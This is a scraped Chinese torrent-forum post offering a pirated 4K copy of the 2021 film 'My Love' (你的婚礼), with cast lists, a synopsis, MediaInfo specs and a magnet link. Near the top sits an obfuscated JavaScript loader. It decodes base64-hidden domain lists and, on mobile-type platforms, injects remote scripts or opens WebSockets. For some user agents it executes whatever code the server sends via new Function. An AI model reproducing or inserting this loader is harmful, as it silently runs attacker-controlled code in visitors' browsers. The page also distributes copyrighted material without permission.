你的婚礼[国语音轨].My.Love.2021.2160p.4K迅雷下载 13.77GB

版主小s 1月前 276

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 你的婚礼 / My Love

◎年 代 2021

◎产 地 中国大陆

◎类 别 爱情

◎语 言 汉语普通话

◎上映日期 2021-04-30(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt14503918/

◎豆瓣评分 4.9/10 (101825人评价)

◎豆瓣链接 https://movie.douban.com/subject/34973399/

◎片 长 115分钟

◎导 演 韩天 Tian Han (id:1314722)

◎编 剧 张影 Ying Zhang (id:1365447)

焦婷婷 Tingting Jiao (id:1338896)

韩天 Tian Han (id:1314722)

◎演 员 许光汉 Greg Hsu (id:1364539)

章若楠 Ruonan Zhang (id:1397180)

丁冠森 Guansen Ding (id:1355327)

晏紫东 Zidong Yan (id:1362288)

郭丞 Cheng Guo (id:1410008)

王莎莎 Shasha Wang (id:1274647)

梁靖康 Jingkang Liang (id:1370070)

刘迅 Xun Liu (id:1370365)

陈佳妍 Jiayan Chen (id:1319246)

茹常虎 Ru Chang Hu (id:1378186)

王鹏 Peng Wang (id:1366073)

王鲁 Lu Wang (id:1348497)

虞海亮 Hailiang Yu (id:1442292)

梁浩 Hao Liang (id:1343081)

嘉泽 Claire (id:1437777)

王冠淇 Guanqi Wang (id:1387972)

徐一娢 Yihan Xu (id:1390430)

卜冠今 Guanjin Bu (id:1362971)

杜秀军 Xiujun Du (id:1389388)

常海波 Haibo Chang (id:1336857)

崔奕 Yi Cui (id:1337870)

孟秀 Xiu Meng (id:1330833)

刘军 Jun Liu (id:1397723)

张弘毅 Hongyi Zhang (id:1319593)

王长田 Changtian Wang (id:1356370)

曹晓北 Xiaobei Cao (id:1453465)

刘琼芳 Qiongfang Liu (id:1417977)

罗恩妮 Annie Lo (id:1378383)

赵珂 Ke Zhao (id:1457600)

陈建骐 Chien-Ci Chen (id:1316643)

朱琳 Lin Zhu (id:1378385)

何爽 Shuang He (id:1384718)

许力文 Li Wen Hsu (id:1362886)

张洪伟 Hongwei Zhang (id:1330645)

龙筱竹 Xiaozhu Long (id:1389654)

张金岩 Rocky Zhang (id:1401864)

◎标 签 爱情 / 青春 / 许光汉 / 初恋 / 校园 / 章若楠 / 婚礼 / 电影

◎简 介

游泳特长生周潇齐(许光汉饰)在一次打架事件中,对初来乍到的转校生尤咏慈(章若楠饰)一见钟情,周潇齐对尤咏慈默默守护,接踵而至的却是女孩的不告而别。随后的人生,周潇齐并没有考上大学,在做网管的间隙突然发现了尤咏慈的踪迹,于是周潇齐复读考上了尤咏慈的大学,为的只是再次站在她面前再续前缘。两人的相遇并没有像想象中那种甜蜜,“恋爱的时机”总是不属于周潇齐,尽管死党张放(丁冠森饰)等人想尽办法帮助周潇齐追爱,可尤咏慈的身边已经有了学长(梁靖康饰)的陪伴。毕业后的两人天各一方,命运却再次让他们相遇,此后的人生,15年的爱情长跑。你的婚礼,也是我的成人礼。

  1. General

  2. Unique ID : 244157446398997892986118862119484796277 (0xB7AF0382EC9A192314C9DC806ACC2D75)

  3. Complete name : 你的婚礼.My.Love.2021.2160p.WEB-DL.DD5.1.H265-HDSWEB.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.8 GiB

  7. Duration : 1 h 54 min

  8. Overall bit rate : 17.2 Mb/s

  9. Encoded date : UTC 2021-06-25 07:44:41

  10. Writing application : mkvmerge v40.0.0 ('Old Town Road + Pony') 64-bit

  11. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 54 min

  19. Bit rate : 16.9 Mb/s

  20. Width : 3 840 pixels

  21. Height : 2 072 pixels

  22. Display aspect ratio : 1.85:1

  23. Frame rate mode : Constant

  24. Frame rate : 25.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.085

  29. Stream size : 13.6 GiB (99%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : E-AC-3

  35. Format/Info : Enhanced AC-3

  36. Commercial name : Dolby Digital Plus

  37. Codec ID : A_EAC3

  38. Duration : 1 h 54 min

  39. Bit rate mode : Constant

  40. Bit rate : 256 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 210 MiB (1%)

  47. Title : Mandarin

  48. Language : Chinese

  49. Service kind : Complete Main

  50. Default : Yes

  51. Forced : No


TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:779AE7477A943791D33A3D35A1B5486C8EA524D0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖